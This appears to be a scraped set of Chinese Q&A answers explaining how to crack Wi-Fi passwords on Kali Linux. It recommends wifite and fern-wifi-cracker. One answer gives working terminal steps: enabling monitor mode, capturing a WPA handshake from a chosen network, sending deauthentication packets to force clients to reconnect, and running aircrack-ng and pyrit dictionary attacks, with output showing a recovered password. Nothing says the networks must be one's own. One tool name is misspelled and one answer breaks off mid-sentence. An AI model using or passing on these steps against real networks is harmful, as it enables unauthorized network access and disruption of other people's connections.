1. kali linux 怎麼破解無線網路密碼
首先,虛擬機內是無法使用內置無線網卡的,如果在虛擬機上用kali破解wifi,是需要usb無線網卡的。
在kali裡面破解無線網:在終端輸入命令wifite,它會打開網卡的監聽模式並掃描附近的無線網顯示出來,顯示一會兒後按下鍵盤上的ctrl+c組合鍵,它會讓你選擇破解的目標網路,這時輸入序號(數字),它就會自動進行破解工作,破解完成有提示。
原理:wifite命令是無線滲透測試的自動化腳本,它實際上是個python腳本,用於自動化調用kali上面的各種工具,像是reaver、aircrack-ng等。它先嘗試pin碼破解,無法用pin碼破解時,會嘗試抓取握手包,用字典進行握手包的暴力破解。pin碼破解的時間比較短,握手包的暴力破解可能會用gpu加速,取決於主機的性能和密碼的復雜程度,虛擬機對握手包暴力破解很無力(性能局限),就指望pin碼破解了。
2. 怎麼用kali linux 破解無線
kali Linux下破解wifi非常簡單,全程只能用下一步來描述。 工具路徑 /usr/share/fern-wifi-cracker python execute.py 即可運行圖形化工具 選擇無線網卡wlan0 然後點擊下面的激活。 打開發現的wifi熱點設備 先載入字典,勾上Automate 然後單擊你
3. 怎麼用kali linux破wifi
首先在台式機上一定要有一個無線網卡,可以是插在主板上的無線網卡,也可以是USB介面的外置無線網卡,但是最好是Kali Linux支持的型號,不然驅動程序的問題很麻煩,X寶上有的賣。
再說Kali,Kali Linux上破解WIFI的工具非常全面,因為Kali有無線滲透測試的功能,但是系統性的學習還是挺麻煩的,一條條的調用命令破解步驟也比較繁瑣,非專業滲透測試人員推薦用一個Kali上面用於無線滲透測試的傻瓜型自動化腳本,那就是wifite。
wifite命令是用於無線滲透測試的自動化測試腳本,它是個python腳本,用於自動化調用kali上面的各種無線測試工具,像是reaver、aircrack-ng等。它會先嘗試PIN碼破解wifi,當無法用PIN碼破解時,會嘗試抓取wifi驗證握手包,然後用Kali上的字典進行握手包的暴力破解。PIN碼破解的時間一般比較短,握手包的暴力破解會用GPU來加速,破解的速度取決於主機的性能配置(還有密碼的復雜程度)。
wifite的使用方法:直接在終端輸入命令wifite,它會調用aircrack-ng打開網卡的監聽模式並掃描附近的無線網路並一一顯示出來,等它顯示一會兒後按下鍵盤上的Ctrl+C組合鍵,它會中斷對無線網的掃描並讓你選擇破解的目標網路,這時輸入要破解的網路的序號(注意是序號,是個數字)並按下回車,它就會自動進行破解工作,破解過程可能很長,也可能會失敗,等到破解完成會有相應的提示。
4. kail linux 怎麼破解無線
首先需要有一台運行kali linux的機器,無論是虛擬機或物理機,一塊支持監聽模式的無線網卡
root@kali:~# iwconfig wlan1 IEEE 802.11bg ESSID:off/any Mode:Managed Access Point: Not-Associated Tx-Power=20 dBm Retry short limit:7 RTS thr:off Fragment thr:off Encryption key:off Power Management:off eth0 no wireless extensions.lo no wireless extensions.
查看無線網卡設備名
root@kali:~# airmon-ng start wlan1Found 2 processes that could cause trouble.If airomp-ng, aireplay-ng or airtun-ng stops working aftera short period of time, you may want to kill (some of) them!-e PID Name2772 dhclient4415 wpa_supplicantInterface Chipset Driverwlan1 Realtek RTL8187L rtl8187 - [phy0] (monitor mode enabled on mon0)
進入監聽模式
airomp-ng mon0 會列出搜索到的所有無線網路
從中找到你要測試破解的,下來BSSID
root@kali:~/test# airomp-ng -w nenew -c 11 --bssid E4:D3:32:41:56:12 mon0 CH 11 ][ Elapsed: 1 min ][ 2014-09-12 23:31 ][ WPA handshake: E4:D3:32:41:56:12 BSSID PWR RXQ Beacons #Data, #/s CH MB ENC CIPHER AUTH ESSID E4:D3:32:41:56:12 -44 53 171 7 0 11 54e. WPA2 CCMP PSK TP-LINK_5612 BSSID STATION PWR Rate Lost Frames Probe E4:D3:32:41:56:12 00:00:00:00:00:00 0 0 - 1 0 18135 E4:D3:32:41:56:12 64:B4:73:40:60:5C -21 1e- 6e 0 7
當看到WPA handshake:說明抓到了握手包,就可以來破解了
如果一直抓不到,可以用如下命令來攻擊,強迫重新握手
aireplay-ng -0 10 -a E4:D3:32:41:56:12 -c 64:B4:73:40:60:5C mon0 --ignore-negative-one
抓到握手包後,就可以用字典來跑密碼了。
root@kali:~/test# aircrack-ng -w ./password.txt nenew-21.cap Opening nenew-21.capRead 18654 packets. # BSSID ESSID Encryption 1 D0:C7:C0:6E:53:53 TP-LINK_5353 WPA (1 handshake)Choosing first network as target.Opening nenew-21.capReading packets, please wait...
跑的速度如何取決於你機器的性能,更取決於你的字典
如果用物理機,有比較好的顯卡,還可以用顯卡來加速破解,效率比cpu高的多
kali linux下裝顯卡驅動,sdk等,參考如下鏈接
http://xiao106347.blog.163.com/blog/static/2159920782013113013549364
http://vistb.net/2011/08/how-to-crack-wifi-part-four/
http://blog.sina.com.cn/s/blog_56a70c040101exje.html
我這里用顯卡,很快就跑出了密碼
root@kali:~# pyrit -r nenew-21.cap -i password.txt -b D0:C7:C0:6E:53:53 attack_passthroughPyrit 0.4.1-dev (svn r308) (C) 2008-2011 Lukas Lueg http://pyrit.googlecode.comThis code is distributed under the GNU General Public License v3+Parsing file 'nenew-21.cap' (1/1)...Parsed 14 packets (14 802.11-packets), got 1 AP(s)Tried 4420221 PMKs so far; 86496 PMKs per second.The password is 'qq123789'.
5. 用kali linux抓取wifi握手包並暴力破解
kali linux前身是BT5系統,作為滲透測試人員的標配裝備,在這就不過多介紹了,接下來我們要使用kali linux完成抓取握手包,破解密碼整個過程。
主要使用Aircrack套裝軟體
附:
Kali Linux使用Aircrack破解wifi密碼(wpa/wpa2)